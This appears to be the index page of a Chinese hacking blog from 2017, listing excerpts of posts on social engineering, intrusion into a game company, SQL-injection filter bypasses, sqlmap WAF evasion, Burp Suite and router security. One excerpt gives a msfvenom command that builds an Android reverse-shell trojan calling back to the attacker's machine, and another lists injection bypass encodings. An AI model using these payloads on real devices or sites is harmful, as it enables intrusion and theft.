社会工程学+Web渗透入侵某游戏公司

2017-7-17 / 0评

第一步 对目标的信息收集 目标是一个游戏公司,域名www.xxx.com 首先查询了whois信息,服务器IP以及所属地,查看页面上所留下的联系方式,以及可以在google和baidu上获取的信息,做了一个整理,初步得到信息: 域名是在万网注册,注册资料上填写的信息为A城市,而该公司的运营地区是B城市,而WEB服务器所在地也是在B城市。 按照wh...

黑客社会工程学攻击的八种常用伎俩

2017-7-17 / 0评

1. 十度分隔法     利用电话进行欺诈的一位社会工程学黑客的首要任务,就是要让他的攻击对象相信,他要么是1)一位同事,要么是2)一位可信赖的专家(比如执法人员或者审核人员).但如果他的目标是要从员工X处获取信息的话,那么他的第一个电话或者第一封邮件并不会直接打给或发给X.     在社会心理学中,六度分...

预防路由器劫持的八大方法介绍

2017-7-16 / 0评

如何防止路由器被劫持 防止路由器劫持的八大方法 1、修改路由器默认用户名与密码 不管是有线还是无线路由器,其默认登陆管理的账号与密码仅为admin,这里就存在很大的安全风险,一旦电脑遭受黑了入侵,那么黑客就可以通过众多周知的路由器默认管理密码,登陆路由器,从而可以监控整个网络与劫持路由器。 详细链接:路由器ad...

使用sqlmap绕过防火墙进行注入

2017-7-14 / 1评

现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境...

使用kali生成木马入侵安卓手机

2017-7-14 / 0评

今天给大家分享的是使用kali生成木马入侵安卓手机 行动开始 先查看kali的ip,我的是1.114   然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 5555是设置的端口,可以...

神器burp suite v1.7.13

2017-7-3 / 0评

Burp Suite是一款信息安全从业人员必备的集 成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了: Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通 过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截...

11种绕过防注入的方法

2017-6-30 / 0评

1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or' swords' =‘swords'...

内网渗透如何防御?

2017-6-26 / 0评

内网渗透,指采用循序渐进的方法,从被忽视的小漏洞入手,综合运用如嗅探、远程溢出、ARP欺骗等多种攻击方式,长期有计划地逐步提升权限,最终控制整个内网的过程。 安全防御的手段已经越来越多,如严格规划网络结构、对内部与外部网络进行隔离、设置网络防火墙、安装杀毒软件等。这些措施大大提高了网络的安全性,黑客已经很难直接攻破一个防御到位的内网系统。 ...

大型目标渗透-入侵信息搜集

2017-6-4 / 1评

在入侵渗透一个大型目标网络时我一般分为4个大步骤,信息搜集-扫描查点-攻击获取权限—清除日志 我看了很多网上的文章或者视频做的都不是太系统。也不太详细。所以我打算做一个系列系统的教程。此次我打算把每个步骤详细的做一次梳理与总结方便想要学习网络安全技术的同学。 什么是信息收集 收集目标的情报信息是一个非常重要的环节。可以大大提高渗透测试...

I say hey,平凡的一天

2017-6-1 / 0评

这年头,大部分人日子都过得特别急,一天二十四小时对你来说明显不够,你忙得自己的喜好都没空顾及。为了节省时间,你可能都依着别人的喜好点头摇头,看起来无比正经,不会犯错,也不用有趣。 有时候演自己都演得太深刻了,好像不融入集体焦虑就被落下一样,好像不跟着段子手留下一串哈哈哈哈就跟特么的被孤冷了似的,跟着别人预设好的节奏摇头晃脑,好过无人应和评论点赞...

1 2 3 4 5 6